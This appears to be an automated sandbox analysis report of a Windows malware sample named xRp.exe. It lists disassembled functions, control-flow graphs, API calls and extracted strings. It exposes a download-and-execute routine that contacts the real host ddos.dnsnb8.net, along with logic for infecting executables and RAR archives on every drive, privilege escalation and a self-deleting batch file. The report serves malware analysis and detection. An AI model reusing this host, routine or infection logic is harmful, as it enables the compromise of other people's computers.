                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E34E54,00E34E58), ref: 00E32832
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                      • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                      • API String ID: 692489704-116600946
                                      • Opcode ID: acbb110669a3a895ae9162ce7230f3d95f63c3228c014f265646d21f9aa9719f
                                      • Instruction ID: 53281c6494aac8bce0ce340616239ea3a4bbd24699008ac91a12ba78fcdf6215
                                      • Opcode Fuzzy Hash: acbb110669a3a895ae9162ce7230f3d95f63c3228c014f265646d21f9aa9719f
                                      • Instruction Fuzzy Hash: 012121B694031C7BDB10A7B59C8DFEB7BACDB04744F0015A5B645F2091E674EF48CA60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 126 e31973-e3199a PathFileExistsA 127 e319a0-e319aa 126->127 128 e31ac7-e31acc 126->128 129 e319af-e319c2 CreateFileA 127->129 130 e31ad0-e31ad5 128->130 131 e31ace 128->131 134 e319c4-e319d3 Sleep 129->134 135 e31a28-e31a36 GetFileSize 129->135 132 e31af0-e31af6 130->132 133 e31ad7-e31ad9 130->133 131->130 133->132 134->129 136 e319d5-e31a0b call e3185b wsprintfA CopyFileA 134->136 137 e31a87-e31a8b 135->137 138 e31a38-e31a3b 135->138 136->135 152 e31a0d-e31a26 CreateFileA 136->152 139 e31a96-e31a9a 137->139 140 e31a8d-e31a90 FindCloseChangeNotification 137->140 138->137 142 e31a3d-e31a51 VirtualAlloc 138->142 144 e31aad-e31ab1 139->144 145 e31a9c 139->145 140->139 142->137 143 e31a53-e31a57 142->143 147 e31a80 143->147 148 e31a59-e31a6d ReadFile 143->148 150 e31ab3-e31ab6 144->150 151 e31adb-e31ae0 144->151 149 e31aa0-e31aa7 DeleteFileA 145->149 147->137 148->137 153 e31a6f-e31a7e 148->153 149->144 150->128 156 e31ab8-e31ac1 VirtualFree 150->156 154 e31ae2-e31ae5 151->154 155 e31ae7-e31aec 151->155 152->135 157 e31a9e 152->157 153->147 153->148 154->155 155->132 158 e31aee 155->158 156->128 157->149 158->132
                                      APIs
                                      • PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
                                      • Sleep.KERNEL32(00000064), ref: 00E319C6
                                      • wsprintfA.USER32 ref: 00E319EC
                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
                                      • GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
                                      • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65
                                      • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00E31A90
                                      • DeleteFileA.KERNEL32(?), ref: 00E31AA7
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E31AC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                      • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\6b1c0b84.exe$TN
                                      • API String ID: 2523042076-4142151661
                                      • Opcode ID: 5f9a1ef7b06d35b3dd642acd68f4e879371e2f43c4660022562d85cd2afaa4a1
                                      • Instruction ID: e41548065cdac0fb547ed26a20f87cafea07b5a8b334453e5ae42b86a7aea2b0
                                      • Opcode Fuzzy Hash: 5f9a1ef7b06d35b3dd642acd68f4e879371e2f43c4660022562d85cd2afaa4a1
                                      • Instruction Fuzzy Hash: 62514B71901219AFCB249FA9CD88AAEBFB8EB0435AF1055ADF515F6190D3709E44CF60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 159 e328b8-e328ff memset wsprintfA 160 e32905-e3290d 159->160 161 e329db-e329df 159->161 160->161 162 e32913-e32919 160->162 163 e32956-e32965 strrchr 162->163 164 e3291b-e3294c memset wsprintfA call e329e2 162->164 163->161 166 e32967-e32978 lstrcmpiA 163->166 167 e32951 164->167 168 e3297a-e32981 call e31e6e 166->168 169 e32988-e32992 lstrcmpiA 166->169 167->161 172 e32986 168->172 169->161 171 e32994-e3299b 169->171 173 e329ad-e329c9 strstr 171->173 174 e3299d-e329a3 171->174 172->161 176 e329d3-e329d6 call e32692 173->176 177 e329cb-e329d1 call e3239d 173->177 174->173 175 e329a5-e329a7 lstrcpy 174->175 175->173 176->161 177->161
                                      APIs
                                      • memset.MSVCRT ref: 00E328D3
                                      • wsprintfA.USER32 ref: 00E328F7
                                      • memset.MSVCRT ref: 00E32925
                                      • wsprintfA.USER32 ref: 00E32940
                                        • Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32A02
                                        • Part of subcall function 00E329E2: wsprintfA.USER32 ref: 00E32A1A
                                        • Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32A44
                                        • Part of subcall function 00E329E2: lstrlen.KERNEL32(?), ref: 00E32A54
                                        • Part of subcall function 00E329E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00E32A6C
                                        • Part of subcall function 00E329E2: strrchr.MSVCRT ref: 00E32A7C
                                        • Part of subcall function 00E329E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00E32A9F
                                        • Part of subcall function 00E329E2: lstrlen.KERNEL32(Documents and Settings), ref: 00E32AAE
                                        • Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32AC6
                                        • Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32ADA
                                        • Part of subcall function 00E329E2: FindFirstFileA.KERNELBASE(?,?), ref: 00E32AEF
                                        • Part of subcall function 00E329E2: memset.MSVCRT ref: 00E32B13
                                      • strrchr.MSVCRT ref: 00E32959
                                      • lstrcmpiA.KERNEL32(00000001,exe), ref: 00E32974
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                      • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                      • API String ID: 3004273771-3007274656
                                      • Opcode ID: 94238ad4527308246789a145f3bd040739900aa9539055d55b21ffa6ea427bf0
                                      • Instruction ID: a8ccd82e684e2cb4f59fb864dbdcc85eaf9373b6a823bd152df18e924f4aff12
                                      • Opcode Fuzzy Hash: 94238ad4527308246789a145f3bd040739900aa9539055d55b21ffa6ea427bf0
                                      • Instruction Fuzzy Hash: E131AF7294030D6BDB21AAB5DC8DFDA7FACAB50314F04145AF6C5B2080E6B49AC4CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 181 e31099-e310b4 182 e310ba-e310c7 181->182 183 e31199-e3119c 181->183 184 e310c8-e310d4 182->184 185 e31184-e31190 184->185 186 e310da 184->186 185->184 188 e31196-e31198 185->188 187 e31113-e31162 call e3185b wsprintfA * 2 URLDownloadToFileA 186->187 191 e31168-e31182 lstrlen Sleep 187->191 192 e310dc-e3110d call e31000 WinExec lstrlen 187->192 188->183 191->185 191->187 192->187 192->188
                                      APIs
                                        • Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894
                                      • WinExec.KERNEL32(?,00000005), ref: 00E310F1
                                      • lstrlen.KERNEL32(00E34748), ref: 00E310FA
                                      • wsprintfA.USER32 ref: 00E3112A
                                      • wsprintfA.USER32 ref: 00E31143
                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00E3115B
                                      • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00E31169
                                      • Sleep.KERNEL32 ref: 00E31179
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                      • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HG$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                      • API String ID: 1280626985-2216925602
                                      • Opcode ID: 1d1f9dc678411e9c143c4fab6803f1812ae526a94c2a7f9fc84459acb170d38c
                                      • Instruction ID: ff09a8b865a513bd798342e530e9c5172db3a81a36d0423717a4fa954b2849b5
                                      • Opcode Fuzzy Hash: 1d1f9dc678411e9c143c4fab6803f1812ae526a94c2a7f9fc84459acb170d38c
                                      • Instruction Fuzzy Hash: 60216BB590124CBEDB24DBA1DC4DFAEBFB8AB45315F115099E500B2190D774AA88CFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 195 e31581-e315f9 call e3185b wsprintfA * 2 lstrlen CreateFileA 198 e31633-e31637 195->198 199 e315fb-e3161b WriteFile CloseHandle 195->199 199->198 200 e3161d-e3162d ShellExecuteA 199->200 200->198
                                      APIs
                                        • Part of subcall function 00E3185B: GetSystemTimeAsFileTime.KERNEL32(?,?,75BF8400,00000000,?,?,?,00E327B5), ref: 00E31867
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31878
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31880
                                        • Part of subcall function 00E3185B: srand.MSVCRT ref: 00E31890
                                        • Part of subcall function 00E3185B: rand.MSVCRT ref: 00E31894
                                      • wsprintfA.USER32 ref: 00E315AA
                                      • wsprintfA.USER32 ref: 00E315C6
                                      • lstrlen.KERNEL32(?), ref: 00E315D2
                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00E315EE
                                      • WriteFile.KERNELBASE(00000000,?,00000000,00000001,00000000), ref: 00E31609
                                      • CloseHandle.KERNEL32(00000000), ref: 00E31612
                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00E3162D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                      • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$open
                                      • API String ID: 617340118-3117919743
                                      • Opcode ID: 1237060e5c191634a61e6c64dea493d7cba2d36bfa26d48bfa962a488ced025b
                                      • Instruction ID: 654f38c54147a76619b49858f205394784f0ba7defe2aae3de659b9dc5f5b8e2
                                      • Opcode Fuzzy Hash: 1237060e5c191634a61e6c64dea493d7cba2d36bfa26d48bfa962a488ced025b
                                      • Instruction Fuzzy Hash: 51111FB6A0222C7ED72097A59C8DEEB7E6CDF59761F000491F549F2051EA649B88CAA0

                                      Control-flow Graph

                                      APIs
                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00E3164F
                                      • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00E3165B
                                      • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\xRp.exe,00000104), ref: 00E3166E
                                      • CreateThread.KERNELBASE(00000000,00000000,00E31099,00000000,00000000,00000000), ref: 00E316AC
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00E316BD
                                        • Part of subcall function 00E3139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E313BC
                                        • Part of subcall function 00E3139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00E313DA
                                        • Part of subcall function 00E3139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00E31448
                                      • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\xRp.exe), ref: 00E316E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\xRp.exe$C:\Windows\system32$Documents and Settings
                                      • API String ID: 123563730-717810370
                                      • Opcode ID: 6bac907d5de68abac79887e832abcdbb229aa6afbb2f871bd604da8a587563bc
                                      • Instruction ID: 5f8a19374d379336f94aadf592e584bcc29aec655bd561ec05a28ffa5db5d7f5
                                      • Opcode Fuzzy Hash: 6bac907d5de68abac79887e832abcdbb229aa6afbb2f871bd604da8a587563bc
                                      • Instruction Fuzzy Hash: 8E11B9715012187FCB2457B6AD4EEAB3EADEB46365F041059F209B10F0D6758544CFA1

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 220 e31000-e31023 CreateFileA 221 e31092-e31096 220->221 222 e31025-e31055 GetFileSize CreateFileMappingA MapViewOfFile 220->222 223 e31057-e3105f 222->223 224 e3107b-e31085 222->224 227 e31061-e3106e call e317d0 223->227 228 e31074-e31075 UnmapViewOfFile 223->228 225 e31087-e3108b CloseHandle 224->225 226 e3108d-e31091 CloseHandle 224->226 225->226 226->221 227->228 228->224
                                      APIs
                                      • CreateFileA.KERNELBASE(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG,http://%s:%d/%s/%s,00E310E8,?), ref: 00E31018
                                      • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 00E31029
                                      • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00E31038
                                      • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 00E3104B
                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00E31075
                                      • CloseHandle.KERNEL32(?), ref: 00E3108B
                                      • CloseHandle.KERNEL32(00000000), ref: 00E3108E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                                      • String ID: HG$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                      • API String ID: 1223616889-862939041
                                      • Opcode ID: 8b37b649dd8f51333af266eb2a1d146bd26fcd9a31ccdb5d76df76a4ca011430
                                      • Instruction ID: 804c275208f5cb0407e82e6456282852a3859dc3b690c00f9b5df7c44edd8741
                                      • Opcode Fuzzy Hash: 8b37b649dd8f51333af266eb2a1d146bd26fcd9a31ccdb5d76df76a4ca011430
                                      • Instruction Fuzzy Hash: DF015BB120425CBFE6246F719C8CE2BBEACEB447A9F004629B245B20A0D6715E488E60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 379 e32b8c-e32bc6 memset GetLogicalDriveStringsA 380 e32c09-e32c28 WaitForMultipleObjects 379->380 381 e32bc8-e32bcc 379->381 384 e32c2a-e32c3a CreateThread 380->384 385 e32c3c-e32c45 380->385 382 e32bfa-e32c07 lstrlen 381->382 383 e32bce-e32bd0 381->383 382->380 382->381 383->382 386 e32bd2-e32bdc GetDriveTypeA 383->386 384->385 386->382 387 e32bde-e32be1 386->387 387->382 388 e32be3-e32bf6 CreateThread 387->388 388->382
                                      APIs
                                      • memset.MSVCRT ref: 00E32BA6
                                      • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00E32BB4
                                      • GetDriveTypeA.KERNELBASE(?), ref: 00E32BD3
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00E32BEE
                                      • lstrlen.KERNEL32(?), ref: 00E32BFB
                                      • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00E32C16
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00002845,00000000,00000000,00000000), ref: 00E32C3A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                      • String ID:
                                      • API String ID: 1073171358-0
                                      • Opcode ID: de0a88fcb5910d83256a3f2bae9f337f001efff177989c0d8f9441b86ca39410
                                      • Instruction ID: 4d678d243cbfc12175ab373ba36545e8049b91c258307c21e6e73c3f15bb605a
                                      • Opcode Fuzzy Hash: de0a88fcb5910d83256a3f2bae9f337f001efff177989c0d8f9441b86ca39410
                                      • Instruction Fuzzy Hash: AF21C3B180015CAFE7249F65AC8CDAEBFADFF04349F141129FA82B2151D7249D0ACF60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 389 e32c48-e32c75 memset call e31973 392 e32cb2-e32cb9 389->392 393 e32c77-e32c7f 389->393 394 e32cbb-e32cc2 VirtualFree 392->394 395 e32cc8-e32ccc 392->395 396 e32c81-e32c8b 393->396 397 e32c8f-e32cac CreateThread WaitForMultipleObjects 393->397 394->395 396->397 397->392
                                      APIs
                                      • memset.MSVCRT ref: 00E32C57
                                        • Part of subcall function 00E31973: PathFileExistsA.KERNELBASE(TN,75BF8400,00000000), ref: 00E31992
                                        • Part of subcall function 00E31973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E319BA
                                        • Part of subcall function 00E31973: Sleep.KERNEL32(00000064), ref: 00E319C6
                                        • Part of subcall function 00E31973: wsprintfA.USER32 ref: 00E319EC
                                        • Part of subcall function 00E31973: CopyFileA.KERNEL32(?,?,00000000), ref: 00E31A00
                                        • Part of subcall function 00E31973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E31A1E
                                        • Part of subcall function 00E31973: GetFileSize.KERNEL32(?,00000000), ref: 00E31A2C
                                        • Part of subcall function 00E31973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00E31A46
                                        • Part of subcall function 00E31973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00E31A65
                                      • CreateThread.KERNELBASE(00000000,00000000,00E32B8C,00000000,00000000,00000000), ref: 00E32C99
                                      • WaitForMultipleObjects.KERNEL32(00000001,00E316BA,00000001,000000FF,?,00E316BA,00000000), ref: 00E32CAC
                                      • VirtualFree.KERNELBASE(00840000,00000000,00008000,C:\Users\user\AppData\Local\Temp\xRp.exe,00E34E5C,00E34E60,?,00E316BA,00000000), ref: 00E32CC2
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\xRp.exe, xrefs: 00E32C69
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                      • String ID: C:\Users\user\AppData\Local\Temp\xRp.exe
                                      • API String ID: 2042498389-1450390661
                                      • Opcode ID: 732323e3cee5bc316de00d15060429b223b5b1b0c10a3f24b7c6742351dfa134
                                      • Instruction ID: 0fe868763e628d24e875a3658e047bce49fbc64af0df361670d52d83f084308b
                                      • Opcode Fuzzy Hash: 732323e3cee5bc316de00d15060429b223b5b1b0c10a3f24b7c6742351dfa134
                                      • Instruction Fuzzy Hash: 320184B16412247FD71497A69C0EEAFBFACEF41B60F105154B605FA1C1D6A0E948C7E0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 398 e32845-e32855 call e3274a 401 e32857 398->401 402 e32878-e3288a DeleteFileA 398->402 403 e32865-e32876 call e32692 401->403 404 e3289a-e328a2 402->404 405 e3288c-e32894 VirtualFree 402->405 403->402 410 e32859-e32860 call e3239d 403->410 407 e328a4-e328a5 CloseHandle 404->407 408 e328ab-e328b5 404->408 405->404 407->408 410->403
                                      APIs
                                        • Part of subcall function 00E3274A: memset.MSVCRT ref: 00E32766
                                        • Part of subcall function 00E3274A: memset.MSVCRT ref: 00E32774
                                        • Part of subcall function 00E3274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00E32787
                                        • Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327AB
                                        • Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327C6
                                        • Part of subcall function 00E3274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\6b1c0b84.exe,00000000), ref: 00E327D4
                                        • Part of subcall function 00E3274A: wsprintfA.USER32 ref: 00E327F4
                                        • Part of subcall function 00E3274A: DeleteFileA.KERNEL32(?,?,00E34E54,00E34E58), ref: 00E3281A
                                        • Part of subcall function 00E3274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00E34E54,00E34E58), ref: 00E32832
                                      • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\6b1c0b84.exe), ref: 00E3287D
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00E32894
                                      • CloseHandle.KERNEL32(FFFFFFFF), ref: 00E328A5
                                        • Part of subcall function 00E32692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,00E32873,?,00000002), ref: 00E326A7
                                        • Part of subcall function 00E32692: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,00E32873,?,00000002), ref: 00E326B5
                                        • Part of subcall function 00E32692: lstrlen.KERNEL32(?), ref: 00E326C4
                                        • Part of subcall function 00E32692: ??2@YAPAXI@Z.MSVCRT ref: 00E326CE
                                        • Part of subcall function 00E32692: lstrcpy.KERNEL32(00000004,?), ref: 00E326E3
                                        • Part of subcall function 00E32692: SetEvent.KERNEL32 ref: 00E3273C
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\6b1c0b84.exe, xrefs: 00E32878
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2059047915.0000000000E31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E30000, based on PE: true
                                      • Associated: 0000000F.00000002.2059025954.0000000000E30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059072505.0000000000E33000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059131530.0000000000E34000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 0000000F.00000002.2059168591.0000000000E36000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_e30000_xRp.jbxd
                                      Similarity
                                      • API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\6b1c0b84.exe
                                      • API String ID: 2533558932-1001431116
                                      • Opcode ID: e4a916d92c56a2f3bd6cb5795736de17c659835c5152fdb39a3219c244a8bc12
                                      • Instruction ID: 1f441cefac8e610d85402a01551570703bdac07b54d5c816e15fc81a6c2dab52
                                      • Opcode Fuzzy Hash: e4a916d92c56a2f3bd6cb5795736de17c659835c5152fdb39a3219c244a8bc12
